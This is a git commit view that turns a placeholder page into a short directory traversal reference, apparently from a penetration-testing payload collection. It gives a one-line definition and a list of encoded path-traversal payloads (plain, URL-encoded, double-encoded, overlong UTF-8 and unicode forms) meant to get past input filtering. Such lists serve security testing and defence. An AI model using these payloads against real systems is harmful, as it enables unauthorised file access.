Traversal Directory payloads

This commit is contained in:
swisskyrepo 2016-10-19 07:51:24 +07:00
parent bed3967509
commit 4dcb7cc6ea

View File

@ -1,12 +1,20 @@
# Title
Lorem
# Traversal Directory
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
## Vuln
## Exploit
```
Code
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
```
## Thanks to
* Lorem
* Ipsum
*